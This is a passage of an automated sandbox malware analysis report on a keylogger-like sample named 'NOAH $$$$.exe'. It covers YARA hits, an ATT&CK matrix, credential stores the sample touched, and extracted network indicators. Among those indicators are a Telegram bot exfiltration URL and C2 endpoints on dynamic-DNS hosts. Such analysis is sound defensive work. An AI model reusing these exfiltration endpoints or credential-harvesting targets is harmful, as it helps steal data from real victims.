              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: NOAH $$$$.exeBinary or memory string: WIN_XP
              Source: NOAH $$$$.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
              Source: NOAH $$$$.exeBinary or memory string: WIN_XPe
              Source: NOAH $$$$.exeBinary or memory string: WIN_VISTA
              Source: NOAH $$$$.exeBinary or memory string: WIN_7
              Source: NOAH $$$$.exeBinary or memory string: WIN_8
              Source: Yara matchFile source: 2.2.RegSvcs.exe.230a8be.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.23099d6.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.23099d6.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2480ee8.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2480ee8.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.4ac0000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2480000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2480000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.4ac0000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.230a8be.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.4475403957.000000000278F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4475149888.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4474835763.00000000022C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4476818594.0000000003721000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4477864222.0000000004AC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3688, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 2.2.RegSvcs.exe.230a8be.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.23099d6.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.23099d6.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2480ee8.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2480ee8.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.4ac0000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2480000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2480000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.4ac0000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.230a8be.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.4475149888.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4474835763.00000000022C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4476818594.0000000003721000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4477864222.0000000004AC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4475403957.0000000002681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 2.2.RegSvcs.exe.230a8be.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.23099d6.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.23099d6.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2480ee8.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2480ee8.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.4ac0000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2480000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2480000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.4ac0000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.230a8be.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.4475149888.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4474835763.00000000022C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4477864222.0000000004AC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3688, type: MEMORYSTR
              Source: Yara matchFile source: 2.2.RegSvcs.exe.230a8be.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.23099d6.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.23099d6.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2480ee8.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2480ee8.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.4ac0000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2480000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2480000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.4ac0000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.230a8be.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.4475403957.000000000278F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4475149888.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4474835763.00000000022C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4477864222.0000000004AC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3688, type: MEMORYSTR
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire Infrastructure2
              Valid Accounts
              2
              Native API
              1
              DLL Side-Loading
              1
              Exploitation for Privilege Escalation
              11
              Disable or Modify Tools
              1
              OS Credential Dumping
              2
              System Time Discovery
              Remote Services11
              Archive Collected Data
              1
              Web Service
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault AccountsScheduled Task/Job2
              Valid Accounts
              1
              DLL Side-Loading
              11
              Deobfuscate/Decode Files or Information
              21
              Input Capture
              1
              Account Discovery
              Remote Desktop Protocol1
              Data from Local System
              4
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
              Valid Accounts
              3
              Obfuscated Files or Information
              Security Account Manager2
              File and Directory Discovery
              SMB/Windows Admin Shares1
              Email Collection
              11
              Encrypted Channel
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
              Access Token Manipulation
              1
              Software Packing
              NTDS127
              System Information Discovery
              Distributed Component Object Model21
              Input Capture
              1
              Non-Standard Port
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
              Process Injection
              1
              DLL Side-Loading
              LSA Secrets131
              Security Software Discovery
              SSH3
              Clipboard Data
              3
              Non-Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
              Valid Accounts
              Cached Domain Credentials11
              Virtualization/Sandbox Evasion
              VNCGUI Input Capture24
              Application Layer Protocol
              Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
              Virtualization/Sandbox Evasion
              DCSync2
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
              Access Token Manipulation
              Proc Filesystem11
              Application Window Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
              Process Injection
              /etc/passwd and /etc/shadow1
              System Owner/User Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
              System Network Configuration Discovery
              Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              NOAH $$$$.exe47%ReversingLabsWin32.Trojan.Generic
              NOAH $$$$.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              NameIPActiveMaliciousAntivirus DetectionReputation
              reallyfreegeoip.org
              188.114.97.3
              truefalse
                high
                api.telegram.org
                149.154.167.220
                truefalse
                  high
                  checkip.dyndns.com
                  158.101.44.242
                  truefalse
                    high
                    mail.starofseasmarine.com
                    166.62.28.135
                    truetrue
                      unknown
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2007/11/2024%20/%2012:59:44%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                          high
                          http://checkip.dyndns.org/false
                            high
                            https://reallyfreegeoip.org/xml/173.254.250.80false
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://www.office.com/RegSvcs.exe, 00000002.00000002.4475403957.0000000002833000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://duckduckgo.com/chrome_newtabRegSvcs.exe, 00000002.00000002.4476818594.0000000003953000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://duckduckgo.com/ac/?q=RegSvcs.exe, 00000002.00000002.4476818594.0000000003953000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://api.telegram.orgRegSvcs.exe, 00000002.00000002.4475403957.000000000276C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoRegSvcs.exe, 00000002.00000002.4476818594.0000000003953000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://api.telegram.org/botRegSvcs.exe, 00000002.00000002.4475403957.000000000276C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475149888.0000000002480000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474835763.00000000022C9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4477864222.0000000004AC0000.00000004.08000000.00040000.00000000.sdmpfalse
                                          high
                                          https://certs.starfieldtech.com/repository/0RegSvcs.exe, 00000002.00000002.4475403957.000000000278F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474157662.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4478061895.0000000004F02000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://certificates.starfieldtech.com/repository/0RegSvcs.exe, 00000002.00000002.4475403957.000000000278F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474157662.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4478061895.0000000004F02000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://reallyfreegeoip.org/xml/173.254.250.80$RegSvcs.exe, 00000002.00000002.4475403957.000000000276C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475403957.0000000002743000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475403957.00000000026FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://certs.starfieldtech.com/repository/1402RegSvcs.exe, 00000002.00000002.4475403957.000000000278F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474157662.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4478061895.0000000004F02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://crl.starfieldtech.com/sfroot-g2.crl0LRegSvcs.exe, 00000002.00000002.4475403957.000000000278F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474157662.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4478061895.0000000004F02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://www.office.com/DzTRegSvcs.exe, 00000002.00000002.4475403957.0000000002833000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.microsoft.coRegSvcs.exe, 00000002.00000002.4478061895.0000000004F02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://ocsp.starfieldtech.com/08RegSvcs.exe, 00000002.00000002.4475403957.000000000278F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4478061895.0000000004F02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RegSvcs.exe, 00000002.00000002.4476818594.0000000003953000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://checkip.dyndns.orgRegSvcs.exe, 00000002.00000002.4475403957.0000000002681000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://ocsp.starfieldtech.com/0;RegSvcs.exe, 00000002.00000002.4475403957.000000000278F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474157662.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4478061895.0000000004F02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=RegSvcs.exe, 00000002.00000002.4476818594.0000000003953000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.office.com/lBjqRegSvcs.exe, 00000002.00000002.4475403957.000000000282E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=RegSvcs.exe, 00000002.00000002.4475403957.000000000276C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://chrome.google.com/webstore?hl=enRegSvcs.exe, 00000002.00000002.4475403957.0000000002802000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475403957.0000000002833000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.ecosia.org/newtab/RegSvcs.exe, 00000002.00000002.4476818594.0000000003953000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://varders.kozow.com:8081RegSvcs.exe, 00000002.00000002.4475149888.0000000002480000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474835763.00000000022C9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475403957.0000000002681000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4477864222.0000000004AC0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                            high
                                                                            http://ocsp.starfieldtech.com/0FRegSvcs.exe, 00000002.00000002.4475403957.000000000278F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474157662.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4478061895.0000000004F02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://aborters.duckdns.org:8081RegSvcs.exe, 00000002.00000002.4475149888.0000000002480000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474835763.00000000022C9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475403957.0000000002681000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4477864222.0000000004AC0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                high
                                                                                https://ac.ecosia.org/autocomplete?q=RegSvcs.exe, 00000002.00000002.4476818594.0000000003953000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://51.38.247.67:8081/_send_.php?LRegSvcs.exe, 00000002.00000002.4475403957.000000000278F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://chrome.google.com/webstore?hl=enDzTRegSvcs.exe, 00000002.00000002.4475403957.0000000002802000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://crl.starfieldtech.com/sfig2s1-677.crl0cRegSvcs.exe, 00000002.00000002.4475403957.000000000278F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474157662.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4478061895.0000000004F02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://anotherarmy.dns.army:8081RegSvcs.exe, 00000002.00000002.4475149888.0000000002480000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474835763.00000000022C9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475403957.0000000002681000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4477864222.0000000004AC0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRegSvcs.exe, 00000002.00000002.4476818594.0000000003953000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://checkip.dyndns.org/qRegSvcs.exe, 00000002.00000002.4475149888.0000000002480000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474835763.00000000022C9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4477864222.0000000004AC0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://reallyfreegeoip.orgRegSvcs.exe, 00000002.00000002.4475403957.00000000026D3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475403957.000000000276C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475403957.0000000002743000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://crl.starfieldtech.com/sfroot.crl0LRegSvcs.exe, 00000002.00000002.4475403957.000000000278F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4478061895.0000000004F02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://mail.starofseasmarine.comRegSvcs.exe, 00000002.00000002.4475403957.000000000278F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    http://certificates.starfieldtech.com/repository/sfig2.crt0RegSvcs.exe, 00000002.00000002.4475403957.000000000278F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474157662.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4478061895.0000000004F02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000002.00000002.4475403957.0000000002681000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RegSvcs.exe, 00000002.00000002.4476818594.0000000003953000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20aRegSvcs.exe, 00000002.00000002.4475403957.000000000276C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedRegSvcs.exe, 00000002.00000002.4475149888.0000000002480000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474835763.00000000022C9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4477864222.0000000004AC0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://chrome.google.com/webstore?hl=enlBjqRegSvcs.exe, 00000002.00000002.4475403957.00000000027FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://reallyfreegeoip.org/xml/RegSvcs.exe, 00000002.00000002.4475403957.00000000026D3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475149888.0000000002480000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474835763.00000000022C9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4477864222.0000000004AC0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  • No. of IPs < 25%
                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                  • 75% < No. of IPs
                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                  149.154.167.220
                                                                                                                  api.telegram.orgUnited Kingdom
                                                                                                                  62041TELEGRAMRUfalse
                                                                                                                  166.62.28.135
                                                                                                                  mail.starofseasmarine.comUnited States
                                                                                                                  26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                                                                                  188.114.97.3
                                                                                                                  reallyfreegeoip.orgEuropean Union
                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                  158.101.44.242
                                                                                                                  checkip.dyndns.comUnited States
                                                                                                                  31898ORACLE-BMC-31898USfalse
                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                  Analysis ID:1550078
                                                                                                                  Start date and time:2024-11-06 12:44:05 +01:00
                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                  Overall analysis duration:0h 7m 52s
                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                  Report type:full
                                                                                                                  Cookbook file name:default.jbs
                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                  Number of analysed new started processes analysed:5
                                                                                                                  Number of new started drivers analysed:0
                                                                                                                  Number of existing processes analysed:0
                                                                                                                  Number of existing drivers analysed:0
                                                                                                                  Number of injected processes analysed:0
                                                                                                                  Technologies:
                                                                                                                  • HCA enabled
                                                                                                                  • EGA enabled
                                                                                                                  • AMSI enabled
                                                                                                                  Analysis Mode:default
                                                                                                                  Analysis stop reason:Timeout
                                                                                                                  Sample name:NOAH $$$$.exe
                                                                                                                  Detection:MAL
                                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@3/1@4/4
                                                                                                                  EGA Information:
                                                                                                                  • Successful, ratio: 100%
                                                                                                                  HCA Information:
                                                                                                                  • Successful, ratio: 97%
                                                                                                                  • Number of executed functions: 50
                                                                                                                  • Number of non-executed functions: 305
                                                                                                                  Cookbook Comments:
                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                  • VT rate limit hit for: NOAH $$$$.exe
                                                                                                                  TimeTypeDescription
                                                                                                                  06:44:57API Interceptor12300691x Sleep call for process: RegSvcs.exe modified
                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  149.154.167.220Justificante de pago.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                    1730880308a25cd41259538643a6a02b355f33de1f56cb7e6d874f22aad09eac2596439da1840.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      Solicita#U00e7#U00e3o de cota#U00e7#U00e3o.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        Quarto Proyectos S.L LISTA DE COMPRAS.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                          xBA TM06-Q6-11-24.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            Order.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
